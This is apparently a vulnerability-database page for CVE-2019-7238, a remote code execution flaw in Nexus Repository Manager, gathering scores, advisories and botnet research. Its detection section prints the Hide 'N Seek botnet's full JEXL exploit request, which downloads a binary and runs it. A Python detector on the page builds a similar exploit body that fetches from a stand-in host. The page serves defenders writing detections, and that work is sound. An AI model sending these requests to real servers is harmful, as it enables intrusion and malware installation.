CVE-2019-7238
Published 2019-03-21
CVE-2019-7238: Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.
Priority: P1 · 93 · Critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-06-10
Exploited in the wild
EPSS: 76.53% (99.5th percentile)
Sonatype Nexus Repository Manager 3 before 3.15.0 is missing access controls on the coreui_Component previewAssets ExtDirect call, which evaluates a caller-supplied JEXL expression; an unauthenticated user can therefore execute arbitrary code on the server. Fixed in 3.15.0.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonatype | nexus_repository_manager | >= 3.0.0 < 3.15.0 | 3.15.0 |
Detection & IOCs (extracted from sources)
Payload template observed in the Hide 'N Seek sample. The `',27h,'` fragments are assembler string syntax for the single-quote byte 0x27, so the expression reads `233.class.forName('java.lang.Runtime').getRuntime().exec([...])`; `%J`, `%T`, `%N` and `%I` are placeholders the bot fills in at run time:
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName(',27h,'java.lang.Runtime',27h,').getRuntime().exec(['flock','-w','0','/tmp/l%N','sh','-c','(wget http://%J/%T -O %N||/bin/busybox tftp -g -l %N -r %T %I)&&chmod 777 %N&&./%N a%J a%J',27h,'])"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
String encryption in the sample: cumulative byte-wise XOR, key 0x87
- Exploit traffic targets POST /service/extdirect with Content-Type: application/json; the payload sets action=coreui_Component, method=previewAssets and a filter with property=expression and type=jexl. Detect this combination in HTTP request bodies to identify CVE-2019-7238 exploitation attempts.
- The exploit is JEXL expression injection via the 'expression' filter property with type 'jexl' in the previewAssets ExtDirect call; look for 'java.lang.Runtime' or 'getRuntime().exec' strings inside JSON POST bodies to /service/extdirect.
- Hide 'N Seek botnet samples use a cumulative byte-wise XOR with key 0x87 for string obfuscation; use this decryption scheme when reverse-engineering captured samples.
- Trend Micro Deep Security DPI rule 1009553 and TippingPoint MainlineDV filter 34706 can be used to detect or block CVE-2019-7238 exploitation traffic.
- The exploit payload template uses format specifiers (%J, %T, %N, %I) as placeholders for attacker-controlled values (host, filename, IP, etc.); actual observed payloads have these substituted with real infrastructure values.
- Hard-coded P2P peer IPs and ports for this Hide 'N Seek variant are hosted externally on Palo Alto's GitHub page and are not reproduced inline in the article; consult that resource for the full peer list.
- Exploitation requires at least one file to exist in any repository on the target NXRM 3 instance; a completely empty repository manager may not be exploitable.
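The first two indicators above can be turned directly into request-body inspection logic. The following is an added example (not code from any of the sources listed on this page): it parses the ExtDirect JSON, finds a `coreui_Component.previewAssets` call whose filter sets `type` to `jexl`, and grades the request `critical` when the `expression` carries the `java.lang.Runtime` / `getRuntime().exec` / `class.forName` primitives seen in the observed payload, or `suspicious` when an unauthenticated caller merely requests JEXL evaluation. The sample request bodies, the `198.51.100.7` host and the `csel` filter type in the benign request are constructed for the example, not captured traffic.

```python
"""Flag CVE-2019-7238 (Nexus previewAssets JEXL injection) attempts in HTTP bodies.

Added example; constructed sample requests, not captured traffic.
"""
import json
import re
from typing import Any, Dict, List, Optional

# Indicators named on this page inside the JEXL expression, plus class.forName,
# which the observed Hide 'N Seek payload uses to reach java.lang.Runtime.
RCE_MARKERS = ("java.lang.Runtime", "getRuntime().exec", "class.forName")
URL_RE = re.compile(r"""https?://[^\s'"\]\)]+""")


def _filters(params: Dict[str, Any]) -> Dict[str, Any]:
    """Collapse the ExtDirect filter list [{property, value}, ...] into a dict."""
    out: Dict[str, Any] = {}
    for f in params.get("filter") or []:
        if isinstance(f, dict) and "property" in f:
            out[f["property"]] = f.get("value")
    return out


def inspect_request(method: str, path: str, content_type: str, body: str) -> Optional[Dict[str, Any]]:
    """Return a finding for a previewAssets/JEXL request, or None for anything else."""
    if method.upper() != "POST" or not path.split("?", 1)[0].endswith("/service/extdirect"):
        return None
    if "application/json" not in content_type.lower():
        return None
    try:
        msg = json.loads(body)
    except ValueError:
        return None
    # ExtDirect permits batching: the body is either one call or a list of calls.
    calls: List[Any] = msg if isinstance(msg, list) else [msg]
    for call in calls:
        if not isinstance(call, dict):
            continue
        if call.get("action") != "coreui_Component" or call.get("method") != "previewAssets":
            continue
        for params in call.get("data") or []:
            if not isinstance(params, dict):
                continue
            flt = _filters(params)
            if str(flt.get("type", "")).lower() != "jexl":
                continue
            expr = str(flt.get("expression", ""))
            markers = [m for m in RCE_MARKERS if m in expr]
            return {
                "severity": "critical" if markers else "suspicious",
                "repository": flt.get("repositoryName"),
                "expression": expr,
                "markers": markers,
                "urls": URL_RE.findall(expr),  # stager/download URLs, for blocklisting
            }
    return None


def _rpc(expression: str, ftype: str, repo: str) -> str:
    """Build a previewAssets body in the shape shown on this page (constructed)."""
    return json.dumps({
        "action": "coreui_Component", "method": "previewAssets",
        "data": [{"page": 1, "start": 0, "limit": 50,
                  "sort": [{"property": "name", "direction": "ASC"}],
                  "filter": [{"property": "repositoryName", "value": repo},
                             {"property": "expression", "value": expression},
                             {"property": "type", "value": ftype}]}],
        "type": "rpc", "tid": 8,
    })


# Constructed samples: an RCE attempt modelled on the page's payload template
# (198.51.100.7 is a documentation address), a bare JEXL probe, and a benign
# content-selector preview using the CSEL filter type.
EXPLOIT_BODY = _rpc(
    "233.class.forName('java.lang.Runtime').getRuntime().exec("
    "['sh','-c','wget http://198.51.100.7/x -O /tmp/x && chmod 777 /tmp/x && /tmp/x'])",
    "jexl", "*")
PROBE_BODY = _rpc("format == 'maven2'", "jexl", "*")
BENIGN_BODY = _rpc("format == 'maven2'", "csel", "maven-releases")


if __name__ == "__main__":
    for label, body in (("exploit", EXPLOIT_BODY), ("probe", PROBE_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_request("POST", "/service/extdirect", "application/json", body))
```

In a real pipeline the `suspicious` grade should only fire for unauthenticated sessions or from outside the admin network; before 3.15.0 a logged-in administrator could legitimately preview a JEXL content selector, and after 3.15.0 JEXL is no longer accepted at all, so any `jexl` filter is worth a look.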
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| ghsa | | 7.5 | HIGH | |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
GHSA
GHSA-4rg3-754f-rcrq: Sonatype Nexus Repository Manager before 3
ghsa_unreviewed·2022-05-13
CVE-2019-7238 [CRITICAL] GHSA-4rg3-754f-rcrq: Sonatype Nexus Repository Manager before 3
Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.
GHSA
HTTP Request Smuggling in Netty
ghsa·2020-02-21·CVSS 7.5
CVE-2020-7238 [HIGH] CWE-444 HTTP Request Smuggling in Netty
HTTP Request Smuggling in Netty
Netty 4.1.43.Final allows HTTP Request Smuggling because it mishandles Transfer-Encoding whitespace (such as a [space]Transfer-Encoding:chunked line) and a later Content-Length header. This issue exists because of an incomplete fix for CVE-2019-16869.
VulnCheck
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-7238 [CRITICAL] Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
Sonatype Nexus Repository Manager before 3.15.0 has an incorrect access control vulnerability. Exploitation allows for remote code execution.
Affected: Sonatype Nexus Repository
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/; https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bots/; https://cujo.com/the-sysrv-botnet-and-how-it-evolved/; https://ww
CISA
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
cisa·2021-12-10·CVSS 9.8
CVE-2019-7238 [CRITICAL] Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
Vulnerability: Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
Affected: Sonatype Nexus Repository Manager
Sonatype Nexus Repository Manager before 3.15.0 has an incorrect access control vulnerability. Exploitation allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-7238
Remediation Due Date: 2022-06-10
No detection rules found.
Nuclei
Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2019-7238 [CRITICAL] Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.
Template (info block as shown on this page):
```yaml
id: CVE-2019-7238
info:
  name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Sonatype Nexus Repository Manager to 3.15.0 or later.
  reference:
    - https://github.com/jas502n/CVE-2019-7238
    - https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Contr
```
Tenable
WatchBog Malware Adds BlueKeep Scanner (CVE-2019-0708), New Exploits (CVE-2019-10149, CVE-2019-11581)
blogs_tenable·2019-07-25·CVSS 9.8
[CRITICAL] WatchBog Malware Adds BlueKeep Scanner (CVE-2019-0708), New Exploits (CVE-2019-10149, CVE-2019-11581)
Unit42
Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
blogs_unit42·2019-06-12·CVSS 9.8
CVE-2018-20062, CVE-2019-7238 [CRITICAL] Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
## Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Ruchna Nigam, Threat Research Center (Threat Research, Vulnerabilities)
Published: June 12, 2019
Tags: CVE-2018-20062, CVE-2019-7238, Exploits, HideNSeek, IoT, Linux, ThinkPHP
Executive Summary
The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
Since its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new exploits, to targeting Android devices via the Android Debug Bridge (ADB).
This post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits - CVE-2018-20062 which targets ThinkPHP installations, and CVE-2019-7238, a Remote Code Execution (RCE) vulnerability in Sonatype Nexus Repository Manager (NXRM) 3 software installations.
While the ThinkPHP exploit has already been seen employed by several Mirai variants, the only other instance of the CVE-2019-7238 vulnerability being ex
Trendmicro
CVE-2019-7238: RCE in Sonatype NXRM 3
blogs_trendmicro·2019-03-14·CVSS 9.8
CVE-2019-7238 [CRITICAL] CVE-2019-7238: RCE in Sonatype NXRM 3
Exploits & Vulnerabilities
## CVE-2019-7238: RCE in Sonatype NXRM 3
By: Govind Sarda, Raghvendra Mishra
Mar 14, 2019
A critical remote code execution (RCE) vulnerability (CVE-2019-7238) was found in Sonatype’s Nexus Repository Manager (NXRM) 3, an open source project that allows developers, such as DevOps professionals, to manage software components required for software development, application deployment, and automated hardware provisioning. This vulnerability in NXRM 3, which reportedly has over 150,000 act
References
- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-7238
Timeline
- 2019-03-21: Published
- 2021-12-10: Added to CISA KEV
- Exploited in the wild